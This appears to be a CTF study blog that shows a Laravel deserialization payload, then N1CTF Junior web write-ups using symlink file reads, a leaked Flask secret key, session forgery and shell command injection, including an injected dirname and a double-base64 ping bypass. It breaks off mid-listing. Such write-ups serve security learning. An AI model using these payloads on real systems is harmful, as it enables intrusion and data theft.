class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Illuminate</span>\<span class="title class_">Foundation</span>\<span class="title 
class_">Testing</span>{</span><br><span class="line"><span class="title class_">class</span> <span class="title class_">PendingCommand</span>{</span><br><span class="line"><span class="title class_">protected</span> $<span class="title class_">command</span>;</span><br><span class="line"><span class="keyword">protected</span> <span class="variable">$parameters</span>;</span><br><span class="line"><span class="keyword">protected</span> <span class="variable">$app</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$test</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$command</span>, <span class="variable">$parameters</span>,<span class="variable">$class</span>,<span class="variable">$app</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="variable language_">$this</span>->command = <span class="variable">$command</span>;</span><br><span class="line"><span class="variable language_">$this</span>->parameters = <span class="variable">$parameters</span>;</span><br><span class="line"><span class="variable language_">$this</span>->test=<span class="variable">$class</span>;</span><br><span class="line"><span class="variable language_">$this</span>->app=<span class="variable">$app</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Illuminate</span>\<span class="title class_">Auth</span>{</span><br><span class="line"><span class="title class_">class</span> <span class="title class_">GenericUser</span>{</span><br><span class="line"><span class="title class_">protected</span> $<span class="title class_">attributes</span>;</span><br><span 
class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="keyword">array</span> <span class="variable">$attributes</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->attributes = <span class="variable">$attributes</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Illuminate</span>\<span class="title class_">Foundation</span>{</span><br><span class="line"><span class="title class_">class</span> <span class="title class_">Application</span>{</span><br><span class="line"><span class="title class_">protected</span> $<span class="title class_">hasBeenBootstrapped</span> = <span class="title class_">false</span>;</span><br><span class="line"><span class="keyword">protected</span> <span class="variable">$bindings</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$bind</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->bindings=<span class="variable">$bind</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">namespace</span>{</span><br><span class="line"><span class="title class_">echo</span> <span class="title class_">urlencode</span>(<span class="title class_">serialize</span>(<span class="title class_">new</span> <span class="title class_">Illuminate</span>\<span class="title class_">Foundation</span>\<span class="title class_">Testing</span>\<span class="title class_">PendingComm</span></span><br><span class="line"><span class="title 
class_">and</span>("<span class="title class_">system</span>",<span class="title class_">array</span>('<span class="title class_">cat</span> /<span class="title class_">flag</span>'),<span class="title class_">new</span> <span class="title class_">Illuminate</span>\<span class="title class_">Auth</span>\<span class="title class_">GenericUser</span>(<span class="title class_">array</span>("<span class="title class_">exp</span></span><br><span class="line"><span class="title class_">ectedOutput</span>"=><span class="title class_">array</span>("0"=>"1"),"<span class="title class_">expectedQuestions</span>"=><span class="title class_">array</span>("0"=>"1"))),<span class="title class_">new</span> <span class="title class_">I</span></span><br><span class="line"><span class="title class_">lluminate</span>\<span class="title class_">Foundation</span>\<span class="title class_">Application</span>(<span class="title class_">array</span>("<span class="title class_">Illuminate</span>\<span class="title class_">Contracts</span>\<span class="title class_">Console</span>\<span class="title class_">Kerne</span></span><br><span class="line"><span class="title class_">l</span>"=><span class="title class_">array</span>("<span class="title class_">concrete</span>"=>"<span class="title class_">Illuminate</span>\<span class="title class_">Foundation</span>\<span class="title class_">Application</span>"))))));</span><br><span class="line"> }</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>Done; we get the flag</p><h1 id="学习计划"><a href="#学习计划" class="headerlink" title="Study plan"></a>Study plan</h1><p>The current plan is to go category by category and keep sharpening each one. Roughly done so far: file inclusion, upload, SQL injection, XSS, deserialization and so on (in the sense that the CTFshow exercises for them are finished). Starting next week I need to set aside some time to learn Java, and after that SSTI and XXE</p><p>I have wanted to say this for a while: web challenges now no longer feel like tests of one or two isolated knowledge points, but rather very comprehensive assessments and challenges, so I think an overall command of the material matters more. Take it one step at a time; staying grounded is very important, and I will keep working hard</p><h1 id="第1-5–1-11周"><a href="#第1-5–1-11周" class="headerlink" title="Week 1.5–1.11"></a>Week 1.5–1.11</h1><p>This week I did two years' worth of N1 Junior challenges. They felt medium-to-hard but very rewarding. Both years' challenges that I worked through tested memory, which felt like the file-descriptor trick from the 极客大挑战 Vibe-SEO challenge I did back in week three. I did not expect such an old knowledge point to get deepened here, so this is a good place to summarize it</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/proc/self/mem is a virtual file that represents the process's entire virtual address space.</span><br><span class="line"></span><br><span class="line">When a process calls open("/proc/self/mem", O_RDONLY), the system allocates an FD (file descriptor) for the opened file.</span><br><span class="line"></span><br><span class="line">Once you hold an FD pointing at mem, you can use lseek(fd, offset, SEEK_SET) to seek to a specific address in memory (that is the offset in the N1 Junior challenge), then read(fd, buf, length) reads the memory contents into a buffer, and through this a file can be read</span><br><span class="line"></span><br><span class="line">Just as in the 极客大挑战 challenge, if you hold an FD pointing at /proc/self/mem, it can also be reached through /proc/self/fd/num</span><br><span class="line">It can also be used to read, by computing addresses, the file that holds the address of the system function, and to write a PoC that achieves RCE (2024 N1 Junior Gavatar)</span><br></pre></td></tr></table></figure><h2 id="2025-N1CTF-Junior-2-2"><a href="#2025-N1CTF-Junior-2-2" class="headerlink" title="2025 N1CTF Junior 2/2"></a>2025 N1CTF Junior 2/2</h2><h3 id="online-unzipper"><a href="#online-unzipper" class="headerlink" title="online_unzipper"></a>online_unzipper</h3><p>The challenge is an online zip extractor, so the obvious guess is leaking data through a symlink in the archive, e.g. /proc/self/cmdline</p><p>Reading /proc/self/environ the same way yields FLASK_SECRET_KEY=#mu0cw9F#7bBCoF!</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HOSTNAME=5ab9cde86ead HOME=/root GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D PYTHON_SHA256=8d3ed8ec5c88c1c95f5e558612a725450d2452813ddad5e58fdb1a53b1209b78 FLASK_APP=app.py FLASK_RUN_HOST=0.0.0.0 PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin LANG=C.UTF-8</span><br></pre></td></tr></table></figure><p>Then read app.py to get the source</p><figure 
class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> uuid</span><br><span class="line"><span class="keyword">from</span> flask <span 
class="keyword">import</span> Flask, request, redirect, url_for,send_file,render_template, session, send_from_directory, abort, Response</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.secret_key = os.environ.get(<span class="string">"FLASK_SECRET_KEY"</span>, <span class="string">"test_key"</span>)</span><br><span class="line">UPLOAD_FOLDER = os.path.join(os.getcwd(), <span class="string">"uploads"</span>)</span><br><span class="line">os.makedirs(UPLOAD_FOLDER, exist_ok=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">users = {}</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/"</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"username"</span> <span class="keyword">not</span> <span class="keyword">in</span> session:</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">"login"</span>))</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">"upload"</span>))</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/register"</span>, methods=[<span class="string">"GET"</span>, <span class="string">"POST"</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">register</span>():</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">"POST"</span>:</span><br><span class="line"> username = request.form[<span class="string">"username"</span>]</span><br><span class="line"> password = request.form[<span 
class="string">"password"</span>]</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> username <span class="keyword">in</span> users:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"用户名已存在"</span></span><br><span class="line"></span><br><span class="line"> users[username] = {<span class="string">"password"</span>: password, <span class="string">"role"</span>: <span class="string">"user"</span>}</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">"login"</span>))</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">"register.html"</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/login"</span>, methods=[<span class="string">"GET"</span>, <span class="string">"POST"</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">login</span>():</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">"POST"</span>:</span><br><span class="line"> username = request.form[<span class="string">"username"</span>]</span><br><span class="line"> password = request.form[<span class="string">"password"</span>]</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> username <span class="keyword">in</span> users <span class="keyword">and</span> users[username][<span class="string">"password"</span>] == password:</span><br><span class="line"> session[<span class="string">"username"</span>] = username</span><br><span class="line"> session[<span class="string">"role"</span>] = users[username][<span class="string">"role"</span>]</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span 
class="string">"upload"</span>))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"用户名或密码错误"</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">"login.html"</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/logout"</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">logout</span>():</span><br><span class="line"> session.clear()</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">"login"</span>))</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/upload"</span>, methods=[<span class="string">"GET"</span>, <span class="string">"POST"</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">upload</span>():</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"username"</span> <span class="keyword">not</span> <span class="keyword">in</span> session:</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">"login"</span>))</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">"POST"</span>:</span><br><span class="line"> file = request.files[<span class="string">"file"</span>]</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> file:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"未选择文件"</span></span><br><span class="line"></span><br><span class="line"> role = session[<span 
class="string">"role"</span>]</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> role == <span class="string">"admin"</span>:</span><br><span class="line"> dirname = request.form.get(<span class="string">"dirname"</span>) <span class="keyword">or</span> <span class="built_in">str</span>(uuid.uuid4())</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> dirname = <span class="built_in">str</span>(uuid.uuid4())</span><br><span class="line"></span><br><span class="line"> target_dir = os.path.join(UPLOAD_FOLDER, dirname)</span><br><span class="line"> os.makedirs(target_dir, exist_ok=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line"> zip_path = os.path.join(target_dir, <span class="string">"upload.zip"</span>)</span><br><span class="line"> file.save(zip_path)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> os.system(<span class="string">f"unzip -o <span class="subst">{zip_path}</span> -d <span class="subst">{target_dir}</span>"</span>)</span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"解压失败,请检查文件格式"</span></span><br><span class="line"></span><br><span class="line"> os.remove(zip_path)</span><br><span class="line"> <span class="keyword">return</span> <span class="string">f"解压完成!<br>下载地址: <a href='<span class="subst">{url_for(<span class="string">'download'</span>, folder=dirname)}</span>'><span class="subst">{request.host_url}</span>download/<span class="subst">{dirname}</span></a>"</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">"upload.html"</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span 
class="string">"/download/<folder>"</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">download</span>(<span class="params">folder</span>):</span><br><span class="line"> target_dir = os.path.join(UPLOAD_FOLDER, folder)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> os.path.exists(target_dir):</span><br><span class="line"> abort(<span class="number">404</span>)</span><br><span class="line"></span><br><span class="line"> files = os.listdir(target_dir)</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">"download.html"</span>, folder=folder, files=files)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/download/<folder>/<filename>"</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">download_file</span>(<span class="params">folder, filename</span>):</span><br><span class="line"> file_path = os.path.join(UPLOAD_FOLDER, folder ,filename)</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(file_path, <span class="string">'r'</span>) <span class="keyword">as</span> file:</span><br><span class="line"> content = file.read()</span><br><span class="line"> <span class="keyword">return</span> Response(</span><br><span class="line"> content,</span><br><span class="line"> mimetype=<span class="string">"application/octet-stream"</span>,</span><br><span class="line"> headers={</span><br><span class="line"> <span class="string">"Content-Disposition"</span>: <span class="string">f"attachment; filename=<span class="subst">(unknown)</span>"</span></span><br><span class="line"> }</span><br><span class="line"> )</span><br><span class="line"> <span 
class="keyword">except</span> FileNotFoundError:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"File not found"</span>, <span class="number">404</span></span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">f"Error: <span class="subst">{<span class="built_in">str</span>(e)}</span>"</span>, <span class="number">500</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> app.run(host=<span class="string">"0.0.0.0"</span>)</span><br></pre></td></tr></table></figure><p>Change the session's role to admin; as administrator you can then choose where the uploaded file is placed.</p><p>Since the secret key is known, forging the cookie is enough.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">os.system(f"unzip -o {zip_path} -d {target_dir}")</span><br></pre></td></tr></table></figure><p>target_dir here is controllable by the admin user, and the dirname it is built from flows unescaped into an os.system() shell string; passing an argument list to subprocess without a shell, or rejecting any dirname that is not a plain UUID, would close this.</p><p>role is taken from the session: role = session["role"]</p><p><img src="C:\Users\18636\AppData\Roaming\Typora\typora-user-images\image-20260111200617102.png" alt="image-20260111200617102"></p><p>From here the command can be constructed: test;ls / > /tmp/1.txt</p><p>Read /tmp/1.txt through a symlink in the same way:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span 
class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">app</span><br><span class="line">bin</span><br><span class="line">boot</span><br><span class="line">dev</span><br><span class="line">entrypoint.sh</span><br><span class="line">etc</span><br><span class="line">flag-BBv4itllamUqk6K9Y8vOpNQw3wiRZEqX.txt</span><br><span class="line">home</span><br><span class="line">leo</span><br><span class="line">lib</span><br><span class="line">lib64</span><br><span class="line">media</span><br><span class="line">mnt</span><br><span class="line">opt</span><br><span class="line">passwd3</span><br><span class="line">proc</span><br><span class="line">root</span><br><span class="line">run</span><br><span class="line">sbin</span><br><span class="line">srv</span><br><span class="line">sys</span><br><span class="line">tmp</span><br><span class="line">usr</span><br><span class="line">var</span><br></pre></td></tr></table></figure><p>Read flag-BBv4itllamUqk6K9Y8vOpNQw3wiRZEqX.txt directly via a symlink.</p><h3 id="ping"><a href="#ping" class="headerlink" title="ping"></a>ping</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span 
class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> ipaddress</span><br><span class="line"><span class="keyword">import</span> flask</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">run_ping</span>(<span class="params">ip_base64</span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> decoded_ip = base64.b64decode(ip_base64).decode(<span 
class="string">'utf-8'</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> re.<span class="keyword">match</span>(<span class="string">r'^\d+\.\d+\.\d+\.\d+$'</span>, decoded_ip):</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> <span class="keyword">if</span> decoded_ip.count(<span class="string">'.'</span>) != <span class="number">3</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> <span class="built_in">all</span>(<span class="number">0</span> <= <span class="built_in">int</span>(part) < <span class="number">256</span> <span class="keyword">for</span> part <span class="keyword">in</span> decoded_ip.split(<span class="string">'.'</span>)):</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> ipaddress.ip_address(decoded_ip):</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">len</span>(decoded_ip) > <span class="number">15</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> re.<span class="keyword">match</span>(<span class="string">r'^[A-Za-z0-9+/=]+$'</span>, ip_base64):</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span 
class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> command = <span class="string">f"""echo "ping -c 1 $(echo '<span class="subst">{ip_base64}</span>' | base64 -d)" | sh"""</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> process = subprocess.run(</span><br><span class="line"> command,</span><br><span class="line"> shell=<span class="literal">True</span>,</span><br><span class="line"> check=<span class="literal">True</span>,</span><br><span class="line"> capture_output=<span class="literal">True</span>,</span><br><span class="line"> text=<span class="literal">True</span></span><br><span class="line"> )</span><br><span class="line"> <span class="keyword">return</span> process.stdout</span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">app = flask.Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/ping'</span>, methods=[<span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ping</span>():</span><br><span class="line"> data = flask.request.json</span><br><span class="line"> ip_base64 = data.get(<span class="string">'ip_base64'</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> ip_base64:</span><br><span class="line"> <span class="keyword">return</span> flask.jsonify({<span class="string">'error'</span>: <span class="string">'no ip'</span>}), <span class="number">400</span></span><br><span class="line"></span><br><span class="line"> result = run_ping(ip_base64)</span><br><span class="line"> <span 
class="keyword">if</span> result:</span><br><span class="line"> <span class="keyword">return</span> flask.jsonify({<span class="string">'success'</span>: <span class="literal">True</span>, <span class="string">'output'</span>: result}), <span class="number">200</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> flask.jsonify({<span class="string">'success'</span>: <span class="literal">False</span>}), <span class="number">400</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/'</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line"> <span class="keyword">return</span> flask.render_template(<span class="string">'index.html'</span>)</span><br><span class="line"></span><br><span class="line">app.run(host=<span class="string">'0.0.0.0'</span>, port=<span class="number">5000</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>The filter only accepts a normal <code>ip</code> format, and the length is limited as well.</p><p>The key line is command = f"""echo "ping -c 1 $(echo '{ip_base64}' | base64 -d)" | sh"""</p><p>ip_base64 is first decoded and validated with Python's base64 library, and then decoded a second time on the Linux command line. Python's base64.b64decode stops at the first padding <code>=</code> and ignores whatever follows, so the check only ever sees the first segment, while the shell's base64 -d decodes the whole string; two concatenated encodings therefore bypass the check. The value that is validated is not the value that is executed: passing the already validated decoded_ip to subprocess without a shell, instead of re-decoding the raw input inside sh, would remove the gap.</p><p>0.0.0.0;cat /flag</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">MC4wLjAuMA==O2NhdCAvZmxhZw==</span><br></pre></td></tr></table></figure><p>That gives the flag.</p><h3 id="Peek-a-Fork"><a href="#Peek-a-Fork" class="headerlink" title="Peek a Fork"></a>Peek a Fork</h3><p>Scanning finds /entrypoint.sh:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">set -e</span><br><span class="line"></span><br><span class="line">echo "$FLAG" > /app/flag.txt</span><br><span class="line"></span><br><span class="line">unset FLAG</span><br><span class="line"></span><br><span class="line">exec python /app/server.py</span><br></pre></td></tr></table></figure><p>Reading server.py gives the source:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span 
class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span 
